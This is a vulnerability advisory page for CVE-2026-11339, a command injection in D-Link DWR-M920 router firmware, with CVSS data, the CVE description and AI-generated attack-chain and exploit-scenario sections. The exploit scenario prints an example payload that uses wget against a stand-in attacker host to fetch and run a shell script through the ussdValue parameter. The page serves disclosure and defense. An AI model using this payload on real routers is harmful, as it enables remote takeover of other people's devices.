
D-Link DWR-M920 CVE-2026-11339

EUVD-2026-34859 · LOW
Command Injection (CWE-77)
2026-06-05 · VulDB · GHSA-p9xf-9grr-8jfx
Score: 2.1 (CVSS 4.0 · NVD)

Severity by source

NVD (primary): 2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: X (Scope is not a metric in CVSS 4.0)

Lifecycle Timeline (3 events)

Severity Changed: Jun 05, 2026 - 17:22 (NVD): MEDIUM -> LOW
CVSS changed: Jun 05, 2026 - 17:22 (NVD): 6.3 (MEDIUM) -> 2.1 (LOW)
Analysis Generated: Jun 05, 2026 - 17:16 (vuln.today)

Description (CVE.org)

A vulnerability was detected in D-Link DWR-M920 up to 1.1.50. The affected element is the function sub_41CF20 of the file /boafrm/formUSSDSetup. The manipulation of the argument ussdValue results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.

Analysis (AI)

Command injection in D-Link DWR-M920 firmware up to version 1.1.50 allows remote authenticated attackers to execute arbitrary OS commands via the ussdValue parameter of the /boafrm/formUSSDSetup endpoint, processed by the vulnerable sub_41CF20 function without input sanitization. The CVSS vector (AV:N/AC:L/PR:L/UI:N) confirms remote, low-complexity exploitation requiring only low-privilege credentials - a realistic threshold on consumer routers commonly deployed with default or weak passwords. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Obtain low-privilege router credentials via defaults or reuse
Delivery: Authenticate to DWR-M920 web management interface
Exploit: Send crafted POST to /boafrm/formUSSDSetup with malicious ussdValue
Execution: sub_41CF20 passes unsanitized input to system command
Persist: Arbitrary OS commands execute on router
Impact: Attacker achieves persistent access or network interception

Vulnerability Assessment (AI)

Exploitation: The target must be a D-Link DWR-M920 running firmware version 1.1.50 or earlier. … Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: The CVSS 6.3 medium score is underpinned by a meaningful set of risk signals: AV:N (network-reachable), AC:L (no special conditions), PR:L (low-privilege authentication required), UI:N (no user interaction), with all three impact dimensions at Low (C:L/I:L/A:L) and unchanged scope (S:U). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.

Exploit Scenario: An attacker with low-privilege credentials on the D-Link DWR-M920 web interface - obtained via default credentials, credential stuffing, or prior reconnaissance - submits a crafted HTTP POST request to `/boafrm/formUSSDSetup` with the `ussdValue` parameter containing shell metacharacters such as `; wget http://attacker.com/shell.sh -O /tmp/s; sh /tmp/s`. The `sub_41CF20` function passes the unsanitized string directly into a system command, causing the injected payload to execute with the web server process's privileges on the router OS. …

Remediation: No vendor-released patch has been identified at time of analysis - the CVSS remediation level is undefined (RL:X) and no patched firmware version is referenced in any available source, including the D-Link vendor site (https://www.dlink.com/). … Detailed patch versions, workarounds, and compensating controls in full report.



CVE-2026-11339 vulnerability details – vuln.today
